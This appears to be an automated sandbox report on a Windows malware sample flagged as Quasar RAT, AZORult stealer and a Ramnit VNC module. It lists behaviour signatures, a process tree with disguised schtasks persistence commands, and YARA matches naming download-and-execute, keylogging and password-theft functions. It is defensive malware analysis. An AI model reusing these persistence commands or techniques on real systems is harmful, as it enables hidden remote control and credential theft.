Play interactive tour

Edit tour

Windows Analysis Report CVbJSUXraQ

Overview

General Information

Sample Name:	CVbJSUXraQ (renamed file extension from none to exe)
Analysis ID:	492794
MD5:	b0b78da613422be0de8de2e2a2d0ce68
SHA1:	a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
SHA256:	efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
Tags:	exeQuasarRAT
Infos:
Most interesting Screenshot:

Detection

AZORult Quasar Ramnit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Yara detected Azorult Info Stealer

Antivirus detection for dropped file

Yara detected Quasar RAT

Yara detected Azorult

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected AZORult Info Stealer

Yara detected Ramnit VNC Module

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Contains VNC / remote desktop functionality (version string found)

Maps a DLL or memory area into another process

Uses known network protocols on non-standard ports

Binary is likely a compiled AutoIt script file

Allocates memory in foreign processes

May check the online IP address of the machine

Injects a PE file into a foreign processes

Sigma detected: Suspicious Svchost Process

Contains functionality to inject code into remote processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

.NET source code references suspicious native API functions

Machine Learning detection for dropped file

AutoIt script contains suspicious strings

Modifies the context of a thread in another process (thread injection)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Yara detected Keylogger Generic

Contains functionality to retrieve information about pressed keystrokes

Checks for available system drives (often done to infect USB drives)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

CVbJSUXraQ.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\CVbJSUXraQ.exe' MD5: B0B78DA613422BE0DE8DE2E2A2D0CE68)

vnc.exe (PID: 6296 cmdline: 'C:\Users\user\AppData\Local\Temp\vnc.exe' MD5: B8BA87EE4C3FC085A2FED0D839AADCE1)

svchost.exe (PID: 5200 cmdline: C:\Windows\system32\svchost.exe -k MD5: 32569E403279B3FD2EDB7EBD036273FA)

windef.exe (PID: 5848 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)

schtasks.exe (PID: 5812 cmdline: 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

winsock.exe (PID: 5628 cmdline: C:\Users\user\AppData\Roaming\SubDir\winsock.exe MD5: B4A202E03D4135484D0E730173ABCC72)

schtasks.exe (PID: 6504 cmdline: 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

CVbJSUXraQ.exe (PID: 4112 cmdline: C:\Users\user\Desktop\CVbJSUXraQ.exe MD5: B0B78DA613422BE0DE8DE2E2A2D0CE68)

schtasks.exe (PID: 6836 cmdline: 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

SystemPropertiesPerformance.exe (PID: 6424 cmdline: C:\Users\user\btpanui\SystemPropertiesPerformance.exe MD5: 9423821A023FB02427783F6385871B3B)

vnc.exe (PID: 4420 cmdline: 'C:\Users\user\AppData\Local\Temp\vnc.exe' MD5: B8BA87EE4C3FC085A2FED0D839AADCE1)

svchost.exe (PID: 1900 cmdline: C:\Windows\system32\svchost.exe -k MD5: 32569E403279B3FD2EDB7EBD036273FA)

windef.exe (PID: 4100 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)

SystemPropertiesPerformance.exe (PID: 6316 cmdline: C:\Users\user\btpanui\SystemPropertiesPerformance.exe MD5: 9423821A023FB02427783F6385871B3B)

schtasks.exe (PID: 2092 cmdline: 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

windef.exe (PID: 6608 cmdline: C:\Users\user\AppData\Local\Temp\windef.exe MD5: B4A202E03D4135484D0E730173ABCC72)

windef.exe (PID: 6684 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)

windef.exe (PID: 7144 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
CVbJSUXraQ.exe	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
CVbJSUXraQ.exe	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
CVbJSUXraQ.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
CVbJSUXraQ.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
CVbJSUXraQ.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
CVbJSUXraQ.exe	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x456f4:$x3: GetKeyloggerLogsResponse 0x45bea:$x4: GetKeyloggerLogs 0x45eb1:$s1: <RunHidden>k__BackingField 0x458bc:$s2: set_SystemInfos 0x45eda:$s3: set_RunHidden 0x45ae8:$s4: set_RemotePath 0x56bf8:$s6: Client.exe 0x56c60:$s6: Client.exe 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	xRAT_1	Detects Patchwork malware	Florian Roth	0x30a28:$x4: xClient.Properties.Resources.resources 0x308e9:$s4: Client.exe 0x45eda:$s7: set_RunHidden
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45e9e:$s1: DoUploadAndExecute 0x4b7b5:$s2: DoDownloadAndExecute 0x45c74:$s3: DoShellExecute 0x46096:$s4: set_Processname 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60 0x14354:$op2: 00 17 03 1F 20 17 19 15 28 0x14dc1:$op3: 00 04 03 69 91 1B 40 0x15620:$op3: 00 04 03 69 91 1B 40
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x456f4:$x1: GetKeyloggerLogsResponse 0x45934:$s1: DoShellExecuteResponse 0x3ed22:$s2: GetPasswordsResponse 0x45807:$s3: GetStartupItemsResponse 0x3bff0:$s4: <GetGenReader>b__7 0x45eb2:$s5: RunHidden 0x45ed0:$s5: RunHidden 0x45ede:$s5: RunHidden 0x45ef2:$s5: RunHidden
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4e590:$x2: Process already elevated. 0x470ef:$x4: get_encryptedPassword 0x4b7b5:$x5: DoDownloadAndExecute
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\Users\user\AppData\Local\Temp\windef.exe	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x456f4:$x3: GetKeyloggerLogsResponse 0x45bea:$x4: GetKeyloggerLogs 0x45eb1:$s1: <RunHidden>k__BackingField 0x458bc:$s2: set_SystemInfos 0x45eda:$s3: set_RunHidden 0x45ae8:$s4: set_RemotePath 0x56bf8:$s6: Client.exe 0x56c60:$s6: Client.exe 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
C:\Users\user\AppData\Local\Temp\windef.exe	xRAT_1	Detects Patchwork malware	Florian Roth	0x30a28:$x4: xClient.Properties.Resources.resources 0x308e9:$s4: Client.exe 0x45eda:$s7: set_RunHidden
C:\Users\user\AppData\Local\Temp\windef.exe	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45e9e:$s1: DoUploadAndExecute 0x4b7b5:$s2: DoDownloadAndExecute 0x45c74:$s3: DoShellExecute 0x46096:$s4: set_Processname 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60 0x14354:$op2: 00 17 03 1F 20 17 19 15 28 0x14dc1:$op3: 00 04 03 69 91 1B 40 0x15620:$op3: 00 04 03 69 91 1B 40
C:\Users\user\AppData\Local\Temp\windef.exe	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x456f4:$x1: GetKeyloggerLogsResponse 0x45934:$s1: DoShellExecuteResponse 0x3ed22:$s2: GetPasswordsResponse 0x45807:$s3: GetStartupItemsResponse 0x3bff0:$s4: <GetGenReader>b__7 0x45eb2:$s5: RunHidden 0x45ed0:$s5: RunHidden 0x45ede:$s5: RunHidden 0x45ef2:$s5: RunHidden
C:\Users\user\AppData\Local\Temp\windef.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\AppData\Local\Temp\windef.exe	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4e590:$x2: Process already elevated. 0x470ef:$x4: get_encryptedPassword 0x4b7b5:$x5: DoDownloadAndExecute
C:\Users\user\AppData\Local\Temp\windef.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
dropped/windef.exe	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x456f4:$x3: GetKeyloggerLogsResponse 0x45bea:$x4: GetKeyloggerLogs 0x45eb1:$s1: <RunHidden>k__BackingField 0x458bc:$s2: set_SystemInfos 0x45eda:$s3: set_RunHidden 0x45ae8:$s4: set_RemotePath 0x56bf8:$s6: Client.exe 0x56c60:$s6: Client.exe 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
dropped/windef.exe	xRAT_1	Detects Patchwork malware	Florian Roth	0x30a28:$x4: xClient.Properties.Resources.resources 0x308e9:$s4: Client.exe 0x45eda:$s7: set_RunHidden
dropped/windef.exe	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45e9e:$s1: DoUploadAndExecute 0x4b7b5:$s2: DoDownloadAndExecute 0x45c74:$s3: DoShellExecute 0x46096:$s4: set_Processname 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60 0x14354:$op2: 00 17 03 1F 20 17 19 15 28 0x14dc1:$op3: 00 04 03 69 91 1B 40 0x15620:$op3: 00 04 03 69 91 1B 40
dropped/windef.exe	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x456f4:$x1: GetKeyloggerLogsResponse 0x45934:$s1: DoShellExecuteResponse 0x3ed22:$s2: GetPasswordsResponse 0x45807:$s3: GetStartupItemsResponse 0x3bff0:$s4: <GetGenReader>b__7 0x45eb2:$s5: RunHidden 0x45ed0:$s5: RunHidden 0x45ede:$s5: RunHidden 0x45ef2:$s5: RunHidden
dropped/windef.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
dropped/windef.exe	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4e590:$x2: Process already elevated. 0x470ef:$x4: get_encryptedPassword 0x4b7b5:$x5: DoDownloadAndExecute
dropped/windef.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
dropped/vnc.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
dropped/vnc.exe	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
C:\Users\user\AppData\Local\Temp\vnc.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\vnc.exe	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Click to see the 26 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45e6e:$s1: DoUploadAndExecute 0x4b785:$s2: DoDownloadAndExecute 0x45c44:$s3: DoShellExecute 0x46066:$s4: set_Processname 0x14400:$op1: 04 1E FE 02 04 16 FE 01 60 0x14324:$op2: 00 17 03 1F 20 17 19 15 28 0x14d91:$op3: 00 04 03 69 91 1B 40 0x155f0:$op3: 00 04 03 69 91 1B 40
00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a66a:$s1: DoUploadAndExecute 0x11ff81:$s2: DoDownloadAndExecute 0x11a440:$s3: DoShellExecute 0x11a862:$s4: set_Processname 0xe8bfc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8b20:$op2: 00 17 03 1F 20 17 19 15 28 0xe958d:$op3: 00 04 03 69 91 1B 40 0xe9dec:$op3: 00 04 03 69 91 1B 40
0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45a06:$s1: DoUploadAndExecute 0x4b31d:$s2: DoDownloadAndExecute 0x457dc:$s3: DoShellExecute 0x45bfe:$s4: set_Processname 0x13f98:$op1: 04 1E FE 02 04 16 FE 01 60 0x13ebc:$op2: 00 17 03 1F 20 17 19 15 28 0x14929:$op3: 00 04 03 69 91 1B 40 0x15188:$op3: 00 04 03 69 91 1B 40
00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
